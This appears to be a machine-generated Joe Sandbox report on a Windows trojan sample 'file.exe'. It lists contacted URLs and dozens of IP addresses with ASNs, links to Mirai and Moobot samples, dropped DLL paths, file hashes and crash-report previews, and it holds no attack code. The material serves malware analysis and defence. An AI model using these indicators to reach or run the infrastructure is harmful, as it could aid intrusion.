      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAAsvchost.exe, 00000028.00000003.2190886218.0000029864929000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 00000000.00000002.1366066074.000001A7F5088000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1364293809.000001A7F5086000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://reseed.i2p-projekt.de/yhar2he6rpt6n0h1w6rh.exe, 00000012.00000002.1546713788.00007FF70C31E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 0000001D.00000002.2203168945.0000027B43FE4000.00000004.00000020.00020000.00000000.sdmp, update.pkg.18.drfalse
      • Avira URL Cloud: safe
      unknown
      https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80605svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 00000000.00000003.1364488310.000001A7F5062000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365876947.000001A7F5063000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1365694389.000001A7F503F000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://reg.i2p/hosts.txtp/main.exe, 00000029.00000002.2528754555.000001FE46EDD000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      70.113.162.253
      unknownUnited States
      11427TWC-11427-TEXASUSfalse
      184.65.173.183
      unknownCanada
      6327SHAWCAtrue
      68.1.55.11
      unknownUnited States
      22773ASN-CXA-ALL-CCI-22773-RDCUSfalse
      5.19.249.240
      unknownRussian Federation
      41733ZTELECOM-ASRUfalse
      89.89.209.95
      unknownFrance
      5410BOUYGTEL-ISPFRfalse
      188.174.130.9
      unknownGermany
      8767MNET-ASGermanyDEfalse
      213.145.125.139
      unknownBulgaria
      9070COOOLBOXBGfalse
      154.61.58.162
      unknownUnited States
      203749HN-ASGBfalse
      5.104.75.170
      unknownRussian Federation
      197328INETLTDTRfalse
      88.210.6.42
      unknownRussian Federation
      25308CITYLAN-ASRUtrue
      107.189.6.31
      unknownUnited States
      53667PONYNETUSfalse
      46.51.90.183
      unknownIran (ISLAMIC Republic Of)
      197207MCCI-ASIRfalse
      135.181.40.188
      unknownGermany
      24940HETZNER-ASDEfalse
      81.183.201.129
      unknownHungary
      5483MAGYAR-TELEKOM-MAIN-ASMagyarTelekomNyrtHUfalse
      85.6.171.9
      unknownSwitzerland
      3303SWISSCOMSwisscomSwitzerlandLtdCHfalse
      138.74.168.219
      unknownUnited States
      2041STNORBERTCOLLEGEUSfalse
      68.65.178.44
      unknownUnited States
      46449ASTREA-NORTHWI-WESTUPMIUSfalse
      47.250.187.161
      unknownUnited States
      45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
      85.239.53.47
      unknownRussian Federation
      134121RAINBOW-HKRainbownetworklimitedHKfalse
      74.222.100.29
      unknownUnited States
      20257FTC-INETUSfalse
      188.187.151.89
      unknownRussian Federation
      41786ERTH-YOLA-ASRUfalse
      24.70.217.209
      unknownCanada
      6327SHAWCAfalse
      31.13.134.204
      unknownRussian Federation
      197765ITPARK_DCRUfalse
      24.231.176.11
      unknownUnited States
      20115CHARTER-20115USfalse
      101.191.73.121
      unknownAustralia
      1221ASN-TELSTRATelstraCorporationLtdAUfalse
      190.22.24.78
      unknownChile
      7418TELEFONICACHILESACLfalse
      24.51.216.45
      unknownUnited States
      30404BSCL-11USfalse
      78.47.80.55
      unknownGermany
      24940HETZNER-ASDEfalse
      99.234.18.44
      unknownCanada
      812ROGERS-COMMUNICATIONSCAfalse
      86.106.93.104
      unknownBelize
      44901BELCLOUDBGfalse
      85.239.63.250
      unknownRussian Federation
      134121RAINBOW-HKRainbownetworklimitedHKfalse
      85.239.52.241
      unknownRussian Federation
      134121RAINBOW-HKRainbownetworklimitedHKfalse
      194.207.132.221
      unknownUnited Kingdom
      12390KINGSTON-UK-ASGBfalse
      85.230.189.73
      unknownSweden
      2119TELENOR-NEXTELTelenorNorgeASNOfalse
      207.178.119.175
      unknownUnited States
      35851BANKERSBANKOFKANSASUSfalse
      188.89.23.222
      unknownNetherlands
      31615TMO-NL-ASNLfalse
      212.118.52.164
      unknownRussian Federation
      56806ASCOM4SRUfalse
      92.95.33.134
      unknownFrance
      15557LDCOMNETFRfalse
      94.156.68.124
      unknownBulgaria
      31420TERASYST-ASBGtrue
      217.10.112.72
      unknownSweden
      35706NAOSEfalse
      159.196.73.121
      unknownAustralia
      4764WIDEBAND-AS-APAussieBroadbandAUfalse
      73.246.172.43
      unknownUnited States
      7922COMCAST-7922USfalse
      176.109.240.152
      unknownRussian Federation
      41709LDS-UAfalse
      141.98.234.85
      unknownRussian Federation
      41011CH-NET-ASROtrue
      99.252.228.84
      unknownCanada
      812ROGERS-COMMUNICATIONSCAfalse
      139.162.110.14
      unknownNetherlands
      63949LINODE-APLinodeLLCUSfalse
      2.135.133.55
      unknownKazakhstan
      9198KAZTELECOM-ASKZfalse
      2.177.52.177
      unknownIran (ISLAMIC Republic Of)
      12880DCI-ASIRfalse
      185.128.245.162
      unknownAustria
      51184FONIRAATfalse
      119.13.124.67
      unknownAustralia
      9723ISEEK-AS-APiseekCommunicationsPtyLtdAUfalse
      108.227.133.164
      unknownUnited States
      7018ATT-INTERNET4USfalse
      IP
      127.0.0.1
      Joe Sandbox version:41.0.0 Charoite
      Analysis ID:1517355
      Start date and time:2024-09-25 01:10:09 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 10m 13s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:43
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:file.exe
      Detection:MAL
      Classification:mal100.troj.evad.winEXE@57/74@1/52
      EGA Information:
      • Successful, ratio: 50%
      HCA Information:Failed
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
      • Excluded IPs from analysis (whitelisted): 20.101.57.9, 20.190.159.2, 20.190.159.71, 20.190.159.64, 40.126.31.73, 40.126.31.67, 20.190.159.68, 40.126.31.69, 20.190.159.23, 13.89.179.12
      • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, login.live.com, twc.trafficmanager.net, www.tm.v4.a.prd.aadg.akadns.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
      • Execution Graph export aborted for target file.exe, PID 3800 because there are no executed function
      • Execution Graph export aborted for target main.exe, PID 3260 because there are no executed function
      • Execution Graph export aborted for target yhar2he6rpt6n0h1w6rh.exe, PID 7704 because it is empty
      • Not all processes where analyzed, report is missing behavior information
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size exceeded maximum capacity and may have missing disassembly code.
      • Report size exceeded maximum capacity and may have missing network information.
      • Report size getting too big, too many NtCreateKey calls found.
      • VT rate limit hit for: file.exe
      TimeTypeDescription
      19:11:08API Interceptor201x Sleep call for process: file.exe modified
      19:11:10API Interceptor49x Sleep call for process: powershell.exe modified
      20:31:00API Interceptor182492x Sleep call for process: main.exe modified
      20:31:06API Interceptor1x Sleep call for process: MpCmdRun.exe modified
      20:31:38API Interceptor1x Sleep call for process: WerFault.exe modified
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      70.113.162.253file.exeGet hashmaliciousUnknownBrowse
        154.61.58.162file.exeGet hashmaliciousUnknownBrowse
          184.65.173.183file.exeGet hashmaliciousUnknownBrowse
            68.1.55.11file.exeGet hashmaliciousUnknownBrowse
              5.104.75.170file.exeGet hashmaliciousUnknownBrowse
                5.19.249.240file.exeGet hashmaliciousUnknownBrowse
                  88.210.6.42file.exeGet hashmaliciousUnknownBrowse
                    107.189.6.31file.exeGet hashmaliciousUnknownBrowse
                      89.89.209.95file.exeGet hashmaliciousUnknownBrowse
                        188.174.130.9file.exeGet hashmaliciousUnknownBrowse
                          213.145.125.139file.exeGet hashmaliciousUnknownBrowse
                            No context
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            SHAWCAfile.exeGet hashmaliciousUnknownBrowse
                            • 24.70.217.209
                            SecuriteInfo.com.Linux.Siggen.9999.13221.8731.elfGet hashmaliciousUnknownBrowse
                            • 50.72.73.81
                            SecuriteInfo.com.Linux.Siggen.9999.32167.12194.elfGet hashmaliciousUnknownBrowse
                            • 24.82.111.181
                            ZgBCG135hk.elfGet hashmaliciousMirai, MoobotBrowse
                            • 24.69.3.95
                            mdfh8nJQAy.elfGet hashmaliciousMirai, MoobotBrowse
                            • 96.52.28.136
                            yMg23n1D5d.elfGet hashmaliciousMirai, MoobotBrowse
                            • 184.65.83.254
                            XPK8NKw7Jv.elfGet hashmaliciousMirai, MoobotBrowse
                            • 24.70.74.89
                            O9M84hUenb.elfGet hashmaliciousMirai, OkiruBrowse
                            • 50.70.203.45
                            jydeTkHxMv.elfGet hashmaliciousUnknownBrowse
                            • 68.148.70.154
                            SecuriteInfo.com.Linux.Siggen.9999.8861.1379.elfGet hashmaliciousMiraiBrowse
                            • 142.230.62.174
                            TWC-11427-TEXASUSfile.exeGet hashmaliciousUnknownBrowse
                            • 70.113.162.253
                            SecuriteInfo.com.Linux.Siggen.9999.29695.14613.elfGet hashmaliciousUnknownBrowse
                            • 72.191.2.31
                            cQOoKCZyG3.elfGet hashmaliciousMiraiBrowse
                            • 70.117.108.32
                            SecuriteInfo.com.Linux.Siggen.9999.21080.24829.elfGet hashmaliciousMiraiBrowse
                            • 70.120.70.106
                            arm7.elfGet hashmaliciousMirai, MoobotBrowse
                            • 76.187.110.110
                            spc.elfGet hashmaliciousMirai, MoobotBrowse
                            • 67.48.82.53
                            95.214.27.183-x86-2024-09-02T08_52_28.elfGet hashmaliciousUnknownBrowse
                            • 66.68.51.160
                            94.156.71.153-sparc-2024-08-29T17_31_55.elfGet hashmaliciousUnknownBrowse
                            • 70.121.73.31
                            154.213.187.80-mips-2024-08-30T23_29_44.elfGet hashmaliciousMiraiBrowse
                            • 66.69.104.43
                            mirai.m68k.elfGet hashmaliciousMiraiBrowse
                            • 75.81.132.111
                            ASN-CXA-ALL-CCI-22773-RDCUSfile.exeGet hashmaliciousUnknownBrowse
                            • 68.1.55.11
                            SecuriteInfo.com.Linux.Siggen.9999.29695.14613.elfGet hashmaliciousUnknownBrowse
                            • 70.186.61.160
                            SecuriteInfo.com.Linux.Siggen.9999.32167.12194.elfGet hashmaliciousUnknownBrowse
                            • 98.187.110.147
                            SecuriteInfo.com.Linux.Siggen.9999.11593.30273.elfGet hashmaliciousUnknownBrowse
                            • 184.181.236.224
                            jade.spc.elfGet hashmaliciousMiraiBrowse
                            • 68.15.246.82
                            Tsunami.arm.elfGet hashmaliciousMiraiBrowse
                            • 98.160.221.195
                            mdfh8nJQAy.elfGet hashmaliciousMirai, MoobotBrowse
                            • 70.179.119.239
                            yMg23n1D5d.elfGet hashmaliciousMirai, MoobotBrowse
                            • 164.170.79.96
                            XPK8NKw7Jv.elfGet hashmaliciousMirai, MoobotBrowse
                            • 98.187.245.127
                            nIl2wyif6Q.elfGet hashmaliciousUnknownBrowse
                            • 68.8.161.89
                            No context
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dllfile.exeGet hashmaliciousUnknownBrowse
                              C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dllfile.exeGet hashmaliciousUnknownBrowse
                                C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dllfile.exeGet hashmaliciousUnknownBrowse
                                  Process:C:\Windows\System32\svchost.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):697182
                                  Entropy (8bit):5.235477364318322
                                  Encrypted:false
                                  SSDEEP:12288:3BXiKZWAAllNJheaP7Qata8BtcV3w6F6BM/vWjfLDxqq6A+kmfDUhbpEj2DDpr1C:v+
                                  MD5:80C0457FA69A2B910FB5B56703E8924A
                                  SHA1:64BCF793C777191E7EB87D808FE062E893FDBB4D
                                  SHA-256:315F5B687D4FA9473112BFBD3A2825A9A0B325A932F0D24F2A773688A38C11AC
                                  SHA-512:363B416C99552360C4F725B05D863AF91AF9AEC15016764AA22E2726DA1288B9C5D3EE9AE1953DA84B11D93EDA17570A6922A9904930E34F9D70E8419D5D8657
                                  Malicious:false
                                  Preview:....Cz_...."....3..=.n...3....R.W..$......,...................4.c.3.a.4.c.b.8.-.a.c.b.f.-.1.9.f.a.-.d.1.7.6.-.d.1.a.a.0.c.9.f.b.9.e.6._...e.t...................................................x.m.l..................z...9.1.a.5.b.4.c.7.-.2.9.a.8.-.e.c.8.0.-.4.3.2.1.-.f.b.e.c.e.a.9.0.6.7.0.5._.t.r.k...................................................x.m.l...h.......h...........f.d.2.d.4.f.f.f.-.b.a.2.c.-.9.3.c.6.-.8.8.b.9.-.8.7.1.8.4.3.d.d.1.9.e.9._.........................................................x.m.l...........@...........e.8.f.f.f.2.d.f.-.6.0.4.1.-.8.f.2.1.-.3.d.f.7.-.d.b.3.1.6.6.1.a.a.0.9.b._.m.e.t...................................................x.m.l...........h.......t...e.8.f.f.f.2.d.f.-.6.0.4.1.-.8.f.2.1.-.3.d.f.7.-.d.b.3.1.6.6.1.a.a.0.9.b._.t.r.k...................................................x.m.l...B...................1.8.8.0.0.6.f.c.-.d.8.8.5.-.b.0.c.b.-.e.4.8.c.-.f.1.c.4.e.d.6.0.a.2.b.6._.........................................................x.m.l...........
                                  Process:C:\Windows\System32\svchost.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):697182
                                  Entropy (8bit):5.235477364318322
                                  Encrypted:false
                                  SSDEEP:12288:3BXiKZWAAllNJheaP7Qata8BtcV3w6F6BM/vWjfLDxqq6A+kmfDUhbpEj2DDpr1C:v+
                                  MD5:80C0457FA69A2B910FB5B56703E8924A
                                  SHA1:64BCF793C777191E7EB87D808FE062E893FDBB4D
                                  SHA-256:315F5B687D4FA9473112BFBD3A2825A9A0B325A932F0D24F2A773688A38C11AC
                                  SHA-512:363B416C99552360C4F725B05D863AF91AF9AEC15016764AA22E2726DA1288B9C5D3EE9AE1953DA84B11D93EDA17570A6922A9904930E34F9D70E8419D5D8657
                                  Malicious:false
                                  Preview:....Cz_...."....3..=.n...3....R.W..$......,...................4.c.3.a.4.c.b.8.-.a.c.b.f.-.1.9.f.a.-.d.1.7.6.-.d.1.a.a.0.c.9.f.b.9.e.6._...e.t...................................................x.m.l..................z...9.1.a.5.b.4.c.7.-.2.9.a.8.-.e.c.8.0.-.4.3.2.1.-.f.b.e.c.e.a.9.0.6.7.0.5._.t.r.k...................................................x.m.l...h.......h...........f.d.2.d.4.f.f.f.-.b.a.2.c.-.9.3.c.6.-.8.8.b.9.-.8.7.1.8.4.3.d.d.1.9.e.9._.........................................................x.m.l...........@...........e.8.f.f.f.2.d.f.-.6.0.4.1.-.8.f.2.1.-.3.d.f.7.-.d.b.3.1.6.6.1.a.a.0.9.b._.m.e.t...................................................x.m.l...........h.......t...e.8.f.f.f.2.d.f.-.6.0.4.1.-.8.f.2.1.-.3.d.f.7.-.d.b.3.1.6.6.1.a.a.0.9.b._.t.r.k...................................................x.m.l...B...................1.8.8.0.0.6.f.c.-.d.8.8.5.-.b.0.c.b.-.e.4.8.c.-.f.1.c.4.e.d.6.0.a.2.b.6._.........................................................x.m.l...........
                                  Process:C:\Windows\System32\WerFault.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):0.9547345336309089
                                  Encrypted:false
                                  SSDEEP:96:gxFTJlKDac6ZsehMX7q9fwQXIDcQic6EcERcw3W3d+HbHg/opAnQzOqg7ThVMkQ1:MA2c6Z/d0MALS36jNAzuiFoZ24lO8l
                                  MD5:479B7DA9B6D81E37380E32A797749E82
                                  SHA1:0611B8AAC0E69B17AD7BC7277DF70F4BC4B60DA8
                                  SHA-256:2A1EF06568B844242D9446C1D30CD6FD4BEFBDA1BF3EF759B2E34CE99E23F81A
                                  SHA-512:EC8665B7A94C33DC274D2DE0EBAEDABE0DAE46A7A619E6C9635BD1720CEAD3CCF449C894BEC756318D2555D10B795594C5F4AA57F8A5956BB61577137EBCF43F
                                  Malicious:true
                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.6.9.7.8.7.7.2.7.4.3.8.4.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.6.9.7.8.7.7.7.5.8.7.3.4.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.f.9.a.f.7.3.4.-.4.c.6.0.-.4.8.e.2.-.a.c.d.a.-.b.f.a.6.7.b.c.7.6.9.9.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.6.a.4.9.1.7.e.-.f.8.0.0.-.4.4.5.8.-.9.a.3.a.-.3.7.a.1.9.c.8.3.b.a.b.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.m.a.i.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.3.4.-.0.0.0.0.-.0.0.1.4.-.1.d.6.b.-.0.8.1.e.e.2.0.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.3.1.8.d.4.3.1.0.6.5.7.e.8.3.6.8.5.5.7.f.1.8.3.e.1.5.c.4.7.c.d.0.0.0.0.f.f.f.f.!.0.0.0.0.a.5.a.c.f.e.6.3.9.7.d.f.f.c.6.1.d.2.4.3.2.0.6.8.8.5.c.3.8.9.e.a.0.5.4.2.8.7.5.5.!.m.a.i.n...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.7.0././.0.1././.0.1.:.0.0.:.0.0.:.0.0.!.1.d.
                                  Process:C:\Windows\System32\WerFault.exe
                                  File Type:Mini DuMP crash report, 15 streams, Wed Sep 25 00:31:17 2024, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):632198
                                  Entropy (8bit):0.9935101964449532
                                  Encrypted:false
                                  SSDEEP:768:QXLY8dXwMupyZBib/4V5v9LZyo6Y//kTW86ulpcWjHRsftyHdbqwnOJyOe6EME9h:QXUAK2kljyt49qwOJMLZ
                                  MD5:7A1FE490CFBFA5248B89E7A22076C3C7
                                  SHA1:9B80E5A26BD1636E70852B6A369680E0828328AC
                                  SHA-256:208F251F9CEC5765939A9B1A4E0106E6FFC2207CB61A836A7E962EE516AE1189
                                  SHA-512:22C100060BA0329183AE7C3DBB8AB6D246C93BC5BDBA96BAB420001913AD151ADD594384B9BEFA372BCC90E8EAAD5924E0407C8DB7FA7C7E00EAFB048FBEE4D8
                                  Malicious:false
                                  Preview:MDMP..a..... ........Y.f............$...........x...8.......................N...........`.......8...........T...........p,...y.......................!..............................................................................eJ......0"......Lw......................T.......4....Y.f.............................@..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\System32\WerFault.exe
                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):6730
                                  Entropy (8bit):3.720508413970361
                                  Encrypted:false
                                  SSDEEP:96:RSIU6o7wVetboT+pOYHV46NJ5aM4UB89bUoDo9fJcm:R6l7wVeJE+pOYHRprB89bUokfJcm
                                  MD5:2E4ADA9E7BC1D693DC1B2F2A8F1026E9
                                  SHA1:9F2AD178C964B1F253F0265F516D58042B4AB7EC
                                  SHA-256:75DF6A04A21557C96F8CC55EC6AF83773B6585F652AE3D76D6C587E67F3D3A8F
                                  SHA-512:73B4EE46C34AEA562038B8158A0BB54AF5B8824C705246E563524355A5FB37C498BBC76A424A8A1D65D11815CDDF9D3232A7D2FB3CAD982EA7E5730BE4974C7D
                                  Malicious:false
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.9.8.8.<./.P.i.
                                  Process:C:\Windows\System32\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4603
                                  Entropy (8bit):4.412705917287101
                                  Encrypted:false
                                  SSDEEP:48:cvIwWl8zsdJg771I9f0WpW8VYjIYm8M4JD2+AFbefiyq85/3s4p3Yiwd:uIjf3I7Et7VQJkefi1Y3Yiwd
                                  MD5:F403891A682708D3B6F256760C82260A
                                  SHA1:53121628AED4F9090A02B036DD0A472AB40E6E8A
                                  SHA-256:4C03A883649DE1767EFE1197AD2CA4CE9524D12AC7E8E6FCFAC3A7F110D51895
                                  SHA-512:0E4815D621E24358B718CADF368D395BC5008C2B0039682EB8607C26F0632F162D85B9B030BCCDFF548B772E5744A2AFE8D7940C6E95EFEB74B18892F673A03C
                                  Malicious:false
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515013" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                  Process:C:\Windows\System32\svchost.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):81034
                                  Entropy (8bit):3.0786359586988734
                                  Encrypted:false
                                  SSDEEP:1536:GkIp9GCETdefnjs1KQSRsSkCc5VZ+z2u+u5vn+S+m+KJj5k+DD+lUao9:GkIp9GCETdefnjs1KQSRsSkCc5VZ+z2K
                                  MD5:82033D26D9F2AB4A4AC30A660CCE88A0
                                  SHA1:6EF8458E1A7EAA3866D40ADC767DE44DFA6D7418
                                  SHA-256:C46147F8E28FCC221F5873B0A21B98D533349EF8EA55AA3336815E0026767E10
                                  SHA-512:9389826C225FF5044CD6C2451BD989F6C124F81FA24552F46AE3B7F00B6801863E4256D72BDB6444C2ED6B65D412D0F343662C44C3A73A70C8F1634A33C38632
                                  Malicious:false
                                  Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                  Process:C:\Windows\System32\svchost.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):13340
                                  Entropy (8bit):2.6855112485147603
                                  Encrypted:false
                                  SSDEEP:96:TiZYWaA85nTD+oYoYoWbHZYEZ34tHi4V1KG9w+qvaWZrMEM7ITcUI3:2ZDaoof8uV0aWZrMEM0Tcb3
                                  MD5:77B0EFDD434A1472A6C9FCD1559364F2
                                  SHA1:46DE3A674460E9AA797DDB347413FE0F5F20664F
                                  SHA-256:399F88162FAEE0843A2C44CEB4DD66252E6153236F4F1D85D97D21908E967DB9
                                  SHA-512:54430129E8CBCF7C6E30133CA504563A9AE667BD32CA6858F7EF0C2E45576191AFA5D8222549A40CE9A851A002CB445CA0AADFEBDE21AF2E303DDB45181D5355
                                  Malicious:false
